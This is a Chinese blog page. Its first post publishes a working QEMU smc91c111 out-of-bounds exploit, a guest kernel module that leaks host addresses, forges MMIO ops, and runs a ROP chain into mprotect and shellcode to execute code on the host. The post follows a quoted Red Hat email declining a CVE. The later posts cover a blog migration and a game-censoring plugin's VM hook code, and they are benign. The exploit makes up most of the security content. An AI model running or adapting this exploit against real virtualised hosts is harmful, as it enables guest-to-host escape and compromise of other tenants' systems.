发表于 | | 阅读次数:

中午整理Macbook硬盘的时候发现了这个半年前看到的然而并没有要来CVE号的漏洞。
嗯、反正也修了半年了,放个exploit……感谢白兔师傅和谢大哥的帮助。纪念那段从来没有挖到过qemu CVE的时光……

Mail

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
Hello Azure,
On Mon, 24 Oct 2016 09:02:19 GMT, azureyang# wrote:
> I found a OOB read/write bug that can cause code execution on host.
> The relation code is in
> hw/net/smc91c111.c:447
> s->data[n][p] = value;
> hw/net/smc91c111.c:553
> return s->data[n][p];
>
> failed to check the border of the passed value, the packet_num and ptr
> can be set by guest mmio operations. With the overwrite of s->mmio-
> >ops, code execution can be achieved.
Thank you so much for reporting this issue. A patch has been sent upstream to fix this issue.
IIUC, the SMSC91C111 ethernet controller is used on the ARM Versatile EP and other similar platforms. Which are mostly used in the prototype development environments. These platforms are not generally used with KVM to provide virtualised guest environments. We could not consider this issue for a CVE as the upstream Qemu project does not consider these issues to be security relevant.
Please see:
->
http://wiki.qemu.org/SecurityProcess#How_impact_and_severity_of_a_bug_is_decided
Thank you so much!
---
Prasad J Pandit / Red Hat Product Security

exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
#include <linux/init.h>
#include <linux/module.h>
#include <linux/slab.h>
#define SMC911_BASE           (unsigned char *)0xd09a6000
void write_on()
{
    unsigned char * addr = SMC911_BASE;
    addr[14] = 2;
}
void set_addr(uint64_t offset)
{
    unsigned char * addr = SMC911_BASE;
    uint64_t ptr = offset%0x800;
    addr[2] = offset/0x800;
    addr[6] = ptr&0xff;
    addr[7] = ptr>>8;
}
void set_uint8(uint64_t offset,uint8_t value)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    addr[8] = value;
}
void set_uint16(uint64_t offset,uint16_t value)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    *(uint16_t *)&addr[8] = value;
}
void set_uint32(uint64_t offset,uint32_t value)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    *(uint32_t *)&addr[8] = value;
}
void set_uint64(uint64_t offset,uint64_t value)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    *(uint32_t *)&addr[8] = value&0xFFFFFFFF;
    set_addr(offset+4);
    *(uint32_t *)&addr[8] = value>>32;
}
void set_memset(uint64_t offset,uint64_t value,uint64_t cbmem)
{
    uint64_t i = 0;
    for (i = 0;i<cbmem;i+=8)
    {
        set_uint64(offset+i,value);
    }
}
void set_memcpy(uint64_t dst_offset,void * src,uint64_t cbmem)
{
    uint8_t * uc_src = (uint8_t*)src; 
    uint64_t i = 0;
    for (i = 0;i<cbmem;i+=8)
    {
        set_uint64(dst_offset+i,*(uint64_t *)(uc_src+i));
    }
}
uint8_t get_uint8(uint64_t offset)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    return addr[8];
}
uint16_t get_uint16(uint64_t offset)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    return *(uint16_t *)&addr[8];
}
uint32_t get_uint32(uint64_t offset)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    return *(uint32_t *)&addr[8];
}
uint64_t get_uint64(uint64_t offset)
{
    unsigned char * addr = SMC911_BASE;
    uint64_t low = 0,high = 0;
    set_addr(offset);
    low = *(uint32_t *)&addr[8];
    set_addr(offset+4);
    high = *(uint32_t *)&addr[8];
    return (uint64_t)high<<32 | low;
}
//qemu-system-arm -M versatilepb -kernel vmlinuz-3.2.0-4-versatile -initrd initrd.img-3.2.0-4-versatile -hda debian_wheezy_armel_standard.qcow2 -append "root=/dev/sda1" -net nic,model=smc91c111 -net user
//mprotect 0x7f11879a2eb0
//libcdata 0x7f1187c65b78
//delta = 0x2c2cc8
//offset = 0x2764
void smc_test(void)
{
    unsigned char * addr = SMC911_BASE;
    uint64_t rop [] = {
        0x00000000006bc31c,//pop rdi; ret;
        0,
        0x000000000052ac4c,//pop rsi; ret;
		0x10000,
		0x0000000000517ea5,//pop rdx; ret;
		0x0000000000000007,//RWE
		0x7f6a14afbeb0,//mprotect
        0x000000000052ac4c,//pop rsi; ret;
		0,
		0x00bc5c1b//jmp rsi;
    };
    uint32_t original_ops = 0, card_base = 0,data_offset=0x2384;
    uint64_t main_arena = 0;
    write_on();
    original_ops = get_uint32(0x43d0-data_offset);
    card_base = get_uint32(0x20b4)-0x4430;
    printk("Host card ops = 0x%0X\ncard base:0x%0X\nfake_mmio_ops:0x%0X\n",original_ops,card_base,card_base+data_offset+0x1800);
    set_memset(0x1800,0,0x80);
    set_uint32(0x1800+1,0x007e29ee);//pop rsi; pop rsp; ret 0x66ff
    set_uint64(0x1800+80,0x6161616162616161);//readb
    set_uint64(0x1800+88,0x6761616168616161);//readw
    set_uint64(0x1800+96,0x6361616164616161);//readl
    set_uint64(0x1800+104,0x696161616a616161);//writeb
    set_uint64(0x1800+112,0x6561616166616161);//writew
    set_uint64(0x1800+120,0x00ba8c41);//writel;push    rdx;call    qword ptr [rbx+1]
    set_uint64(0x1800+0x80,rop[0]+1);
    main_arena = get_uint64(0x2764);
    rop[1] = card_base&0xFFFFFFFFFFFFF000;
    rop[6] = main_arena - 0x2c2cc8;
    rop[8] = card_base+data_offset+0x1888;
    set_memcpy(0x1800+0x66FF+0x88,rop,sizeof(rop));
    set_memcpy(0x1800+0x88,shellcode,sizeof(shellcode));
    set_uint32(0x43d0-data_offset,card_base+data_offset+0x1800);
    *(uint32_t *)&addr[0] = card_base+data_offset+0x1800+0x80;//boom! Can only write low part to rdx because use 32 bit arm,
    //aarch64 can overwrite mmio->ops->valid->max_access_size and mmio->ops->write to achieve extended register control 
    //rsi -> 0-0xf
    //rdx -> 0-0xFFFFFFFF
    //rbx -> controled memory
}
int init_module(void)
{
    smc_test();
    return 0;
}
void cleanup_module(void)
{
}

发表于 | | 阅读次数:

umm,之前常年不管理wordpress,然后这玩意漏洞太多了导致坑娘服务器被撸……于是这次干脆直接要来域名在自己服务器上搭建了,因为wordpress臃肿而且漏洞多……所以以后就用hexo了,感觉这个还是挺清新的。以前的东搬不搬的看心情,各位老爷们要是想看以前的内容请直接访问Internet Archive,以后blog会继续更新。都好几年没写东西了,再不写点感觉自己都废了。

发表于 | | 阅读次数:

插件下载:
HarmoFavo

1
2
3
4
5
6
7
v0.2[2014.2.19]
[+]全自动配置
v0.11[2014.2.19]
[+]支持Wiz Anniversary、funta支持不能……那玩意章节表比较奇葩、
[+]CG Patch
v0.1 [2014.2.3]
第一个版本

本插件理论上支持所有使用Favorite社游戏引擎的游戏、并且目前已有的3个汉化版全部支持、现在已经支持全自动和谐……您只需要将本插件释放到游戏目录并用AlphaROMdiE装载游戏即可。
使用方法:【请在使用前认真阅读!
首先确保您的游戏目录是这样的、HarmoFavo下载下去以后直接释放到游戏目录即可

上个图证明可以支持光鸟鸟、色鸟鸟也可以支持、方法看评论一楼的回复
和谐后的光鸟鸟、其他的图就不上了……那个加奈和澪的3P因为是男猪开脑洞梦到的……所以那个没辙╮( ̄▽ ̄”)╭ 顾及18R的小盆友要玩的时候要小心这个坑。

【这里为老版本的说明、不必阅读】然后打开plugin目录、创建一个文本文档命名为config、然后里面的内容是需要解析的游戏的hcb文件。【为了兼容各种汉化补丁所以没有搞成自动的、搞成自动的兼容性会降低的。然后把那个文件从游戏目录复制到plugin目录下、比如我要让星空的记忆FD汉化版和谐一下,就复制汉化后的脚本执行体hoshimemo_ehchn.bch到plugin目录然后再填写config的内容即可。如下图

然后回到游戏目录、启动AlphaROMdiE、勾选禁止转码、把游戏可执行文件拖到上面、比如汉化版是Hoshimemo_EHchn.exe、然后会生成一个快捷方式、以后从这里点进去就是和谐版的游戏啦~

和谐效果如下图

被屏蔽掉的肯定就是H图啦~

有一个误伤的没办法、后来确认了下那张CG的确是出现在某H情节里……

啧啧啧、看看这有多少H

ETC的内容还是可以全部看到的(:з」∠)这里一般不会有H的

吐槽时间:
(:з」∠)这两天戳了下Favorite的引擎、感谢AmaranthF对Favorite社游戏引擎的vm拆解……

hcb可执行体主要分成几个区域

1
2
3
4
5
6
7
8
9
10
11
———————
public functions
———————
dispatcher
———————
para jumper[optional]
———————
para code
———————
H memo code
———————

目前的做法比较简单粗暴、就是计算一下H memo code起始的地方、如果有call到这里的话直接给ret回去
插件关键代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
vector<DWORD> ChcbVM::GetNCallSequence(DWORD & offset)
{
	return GetLastNCallSequenceCond(offset,0x01);
}
vector<DWORD> ChcbVM::GetLastNCallSequenceCond(DWORD & offset, BYTE bOP)
{
	vector<DWORD> retVal;
	DWORD ori = bin.seek(0,FILE_CURRENT);
	bin.seek(offset,FILE_BEGIN);
	WORD tmp1;
	BYTE tmp0;
	do 
	{
		bin.read(&tmp0,1);//skip initStack
		offset++;
	} while (tmp0!=0x01);//从一个函数头开始反编译
	bin.read(&tmp1,2);//skip initStack param
	offset+=2;
	for (BYTE op;;)
	{
		op=bin.readb();
		if (op == 0x2)//native call
		{
			DWORD native = bin.readdw();
			retVal.push_back(native);
			offset+=5;
		}
		else if (op==0x1)
		{
			break;
		}
		else if (op==bOP)
		{
			retVal.clear();
			offset+=vmlde(op);
		}
		else
		{
			offset+=vmlde(op);
		}
	}
	bin.seek(ori,FILE_BEGIN);
	return retVal;
}
int comp(const void* a,const void* b)
{
	return *(PDWORD)a>*(PDWORD)b;
}
vector<DWORD> ChcbVM::GetNCallList(DWORD & offset)
{
	auto && res = GetNCallSequence(offset);
	sort(res.begin(),res.end());
	vector<DWORD> retVal;
	for (size_t idx = 0;idx<res.size();++idx)
	{
		if (*(retVal.end()-1)!=res[idx])
		{
			retVal.push_back(res[idx]);
		}
	}
	return retVal;
}
DWORD ChcbVM::AnalysisPara(void)
{
	auto && res = GetLastNCallSequenceCond(hdr.EntryPoint,0x7);//最后的条件跳转后的calllist
	/*
	22C85	jz 22C8F
	22C8A	call 233EC;title
	22C8F	call 22CB1;start
	*/
	DWORD offsetParaDispacher = 0;
	if (res.size())
	{
		int idx = 1;
search0:
		DWORD offset = res[idx];
		auto && res2 = GetNCallSequence(offset);//for most game
		if (res2.size()<=2)
		{
			offsetParaDispacher = *(res2.end() - 1);
		}
		else
		{
			++idx;//Wiz
			goto search0;
		}
	}
	auto && ParaList = GetNCallList(offsetParaDispacher);
	return GetNextFuncOffset(*(ParaList.end() - 1));
}
typedef DWORD (__fastcall __pfnvCall)(void *unk1,DWORD unk0);
DWORD __fastcall vCall(
	void *unk1,//ecx
	DWORD unk0,//edx
	DWORD RetAddr,
	__pfnvCall pfnvCall)
{
	PDWORD pvIP = PDWORD((char *)unk1+offsetvIP);
	if (*pvIP>offsetLast)
	{
		*pvIP = offsetLast;
		return offsetLast;
	}
	return pfnvCall(unk1,unk0);
}